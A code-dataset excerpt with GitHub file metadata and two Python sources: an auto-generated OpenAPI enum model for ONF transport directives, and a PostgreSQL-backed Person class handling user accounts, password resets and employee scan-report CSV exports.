"size": "4734",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "androguard/gui/xrefwindow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "384130"
},
{
"name": "C++",
"bytes": "57006"
},
{
"name": "JavaScript",
"bytes": "2205"
},
{
"name": "Makefile",
"bytes": "6008"
},
{
"name": "Python",
"bytes": "1731263"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from tapi_server.models.base_model_ import Model
from tapi_server import util
class TapiCommonDirectiveValue(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
"""
allowed enum values
"""
MINIMIZE = "MINIMIZE"
MAXIMIZE = "MAXIMIZE"
ALLOW = "ALLOW"
DISALLOW = "DISALLOW"
DONT_CARE = "DONT_CARE"
def __init__(self): # noqa: E501
"""TapiCommonDirectiveValue - a model defined in OpenAPI
"""
self.openapi_types = {
}
self.attribute_map = {
}
@classmethod
def from_dict(cls, dikt) -> 'TapiCommonDirectiveValue':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The tapi.common.DirectiveValue of this TapiCommonDirectiveValue. # noqa: E501
:rtype: TapiCommonDirectiveValue
"""
return util.deserialize_model(dikt, cls)
| {
"content_hash": "474b8ccf49ed3df0fdc3de4771eb6a95",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 96,
"avg_line_length": 25.636363636363637,
"alnum_prop": 0.6312056737588653,
"repo_name": "karthik-sethuraman/ONFOpenTransport",
"id": "abef1a8bde0ff83221f770cdf53d2125e978c2d9",
"size": "1145",
"binary": false,
"copies": "4",
"ref": "refs/heads/develop",
"path": "RI/flask_server/tapi_server/models/tapi_common_directive_value.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "836"
},
{
"name": "D",
"bytes": "2195"
},
{
"name": "Python",
"bytes": "960828"
},
{
"name": "Shell",
"bytes": "3059"
}
],
"symlink_target": ""
} |
import copy
import logging
import os
import textwrap
import urllib
import uuid
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import itsdangerous
import psycopg2.extras
from profiles import configwrapper
log = logging.getLogger(__name__)
class PersonFactory(psycopg2.extras.CompositeCaster):
def make(self, values):
d = dict(zip(self.attnames, values))
return Person(**d)
class Person(object):
def __init__(self, person_uuid, email_address, salted_hashed_password,
person_status, display_name, is_superuser,
inserted,
updated):
self.person_uuid = person_uuid
self.email_address = email_address
self.salted_hashed_password = salted_hashed_password
self.person_status = person_status
self.display_name = display_name
self.is_superuser = is_superuser
self.inserted = inserted
self.updated = updated
def __repr__(self):
return '<{0}.{1} ({2}:{3}) at 0x{4:x}>'.format(
self.__class__.__module__,
self.__class__.__name__,
self.person_uuid,
self.display_name,
id(self))
def __eq__(self, other):
return self.person_uuid == getattr(other, 'person_uuid', -1)
@classmethod
def insert(cls, pgconn, email_address, raw_password,
display_name):
"""
Insert a new person
"""
cursor = pgconn.cursor()
cursor.execute("""
insert into people
(email_address, display_name,
salted_hashed_password, person_status)
values
(
%(email_address)s, %(display_name)s,
crypt(%(raw_password)s, gen_salt('bf')),
'confirmed'
)
returning (people.*)::people as person
""",{'email_address':email_address, 'display_name':display_name,
'raw_password':raw_password })
new_person = cursor.fetchone().person
return new_person
@classmethod
def by_email_address(cls, pgconn, email_address):
cursor = pgconn.cursor()
cursor.execute(textwrap.dedent("""
select (p.*)::people as p
from people p
where email_address = %(email_address)s
"""), {'email_address': email_address})
if cursor.rowcount:
return cursor.fetchone().p
else:
raise KeyError("Sorry, couldn't find {0}!".format(
email_address))
@classmethod
def select_all(cls, pgconn, offset=0, limit=10, sort='asc'):
cursor = pgconn.cursor()
cursor.execute(textwrap.dedent("""
select (p.*)::people as p
from people p
order by display_name
"""))
for row in cursor:
yield row.p
@classmethod
def select_count(cls, pgconn):
cursor = pgconn.cursor()
cursor.execute(textwrap.dedent("""
select count(*)
from people
"""))
return cursor.fetchone().count
@property
def __jsondata__(self):
d = copy.copy(self.__dict__)
d['my_scan_report'] = "/csv/{0}".format(self.my_scan_report_file_name)
return d
@classmethod
def by_person_uuid(cls, pgconn, person_uuid):
cursor = pgconn.cursor()
cursor.execute(textwrap.dedent("""
select (p.*)::people as p
from people p
where person_uuid = %(person_uuid)s
"""), {'person_uuid': person_uuid})
if cursor.rowcount:
return cursor.fetchone().p
def send_reset_password_email(self, cw):
signer = itsdangerous.URLSafeTimedSerializer(cw.app_secret)
tmpl = cw.j.get_template("emailtemplates/password-reset.html")
html_email = MIMEText(tmpl.render({
"email_address": self.email_address,
"host": cw.host,
"web_host": cw.web_host,
"payload": signer.dumps({
"email_address": self.email_address}),
}
), "html")
msg = MIMEMultipart('alternative')
msg['Subject'] = "Password Reset for {0}".format(self.display_name)
msg['From'] = "streamliner@{0}".format(cw.host)
msg['To'] = self.email_address
msg.attach(html_email)
smtp_connection = cw.make_smtp_connection()
smtp_connection.sendmail(
"streamliner@{0}".format(cw.host),
[self.email_address],
msg.as_string())
log.info("Just sent confirm-signup email")
def update_my_password(self, pgconn, current_password,
new_password):
cursor = pgconn.cursor()
cursor.execute(textwrap.dedent("""
update people
set salted_hashed_password = crypt(
%(new_password)s, gen_salt('bf'))
where person_uuid = %(person_uuid)s
and salted_hashed_password = crypt(
%(current_password)s,
salted_hashed_password)
returning (people.*)::people as p
"""), dict(
new_password=new_password,
person_uuid=self.person_uuid,
current_password=current_password))
if cursor.rowcount:
return cursor.fetchone().p
else:
raise KeyError("Sorry, no person with UUID {0}"
" and that current password found!".format(
self.person_uuid))
def update_my_status(self, pgconn, new_status):
cursor = pgconn.cursor()
cursor.execute(textwrap.dedent("""
update people
set person_status = %(person_status)s
where person_uuid = %(person_uuid)s
returning (people.*)::people as p
"""), {'person_status':new_status,
'person_uuid':self.person_uuid})
if cursor.rowcount:
return cursor.fetchone().p
else:
raise KeyError("Sorry, bad status {0}!".format(new_status))
@staticmethod
def write_scanner_speed_csv(pgconn, savedir):
out_file_path = os.path.join(savedir, "scanner-speed.csv")
qry = textwrap.dedent("""
copy (
select to_char(date_trunc('day', a.inserted), 'YYYY-MM-DD') as date,
p.display_name as scanner,
count(*) total_scans,
case when count(*) > 1
then
round(
count(*) / (extract ('epoch' from max(a.inserted) - min(a.inserted))::numeric / 60),
1)
else NULL
end as scans_per_minute,
to_char(min(a.inserted), 'HH12:MI AM') as first_scan_of_day,
to_char(max(a.inserted), 'HH12:MI AM') as last_scan_of_day
from assets a
join people p
on a.unpacked_by = p.person_uuid
where a.inserted > current_timestamp - interval '30 days'
group by 1, 2
order by 1 desc, 2
) to stdout
with csv header
""")
cursor = pgconn.cursor()
f = open(out_file_path, "w")
cursor.copy_expert(qry, f)
log.info("Saved scanner speed report to {0}.".format(out_file_path))
return out_file_path
@staticmethod
def write_employee_scan_report(pgconn, person_uuid,
starting_date, ending_date, savedir):
"""
Write a report listing every asset scanned by this person.
"""
cursor = pgconn.cursor()
qry = cursor.mogrify(textwrap.dedent("""
copy (
select p.display_name as scanned_by,
a.tlm_id as truck_manifest_id,
t.bol,
a.itemdesc,
a.asin,
a.upc,
to_char(a.inserted, 'YYYY-MM-DD') as scanned_date,
to_char(a.inserted, 'HH12:MI AM') as scanned_time,
ah.actual_disposition,
c.container_id,
a.recommended_disposition,
ah.actual_disposition,
count(*) as units
from assets a
join people p
on p.person_uuid = a.unpacked_by
join truck_level_manifests t
on a.tlm_id = t.tlm_id
join asset_history ah
on a.asset_uuid = ah.asset_uuid
and current_timestamp <@ ah.effective
left join containers c
on ah.container_uuid = c.container_uuid
where a.unpacked_by = %(person_uuid)s
and (
%(starting_date)s is null
or a.inserted >= %(starting_date)s)
and (
%(ending_date)s is null
or a.inserted <= %(ending_date)s)
group by 1, 2, 3, 4, 5, 6, a.inserted, 9, 10, 11, 12
order by a.inserted desc
) to stdout
with csv header
"""), dict(
person_uuid=person_uuid,
starting_date=starting_date,
ending_date=ending_date))
p = Person.by_person_uuid(pgconn, person_uuid)
out_file_path = os.path.join(
savedir,
p.my_scan_report_file_name)
f = open(out_file_path, "w")
cursor.copy_expert(qry, f)
log.info("Saved employee scan report for {0} ({1}-{2})".format(
person_uuid, starting_date, ending_date))
return out_file_path
@staticmethod
def write_scan_reports_for_active_employees(pgconn, savedir,
starting_date, ending_date):
cursor = pgconn.cursor()
cursor.execute(textwrap.dedent("""
select p.*::people
from people p
where person_status != 'deactivated'
"""))
for row in cursor:
Person.write_employee_scan_report(pgconn, row.p.person_uuid,
starting_date, ending_date, savedir)
log.info("Wrote scan reports for all active (not deactivated) employees")
@property
def my_scan_report_file_name(self):
return "employee-scan-report-{0}-{1}.csv".format(
urllib.quote_plus(self.display_name.lower()),
self.person_uuid)
| {
"content_hash": "af0a6a2c7b442342d09f7ba8ed4a79af",
"timestamp": "",
"source": "github",
"line_count": 386,
"max_line_length": 104,
"avg_line_length": 27.145077720207254,
"alnum_prop": 0.5300629891200611,
"repo_name": "216software/Profiles",
"id": "6b4f11a0760600d76fc887d0c786863fa702758c",
"size": "10527",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "profiles/profiles/pg/people.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "147379"
},
{
"name": "HTML",
"bytes": "385453"
},
{
"name": "JavaScript",
"bytes": "375694"
},
{
"name": "Jinja",
"bytes": "35800"
},
{
"name": "PLpgSQL",
"bytes": "669968"
},
{
"name": "Python",
"bytes": "2903090"
},
{
"name": "Shell",
"bytes": "6185"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.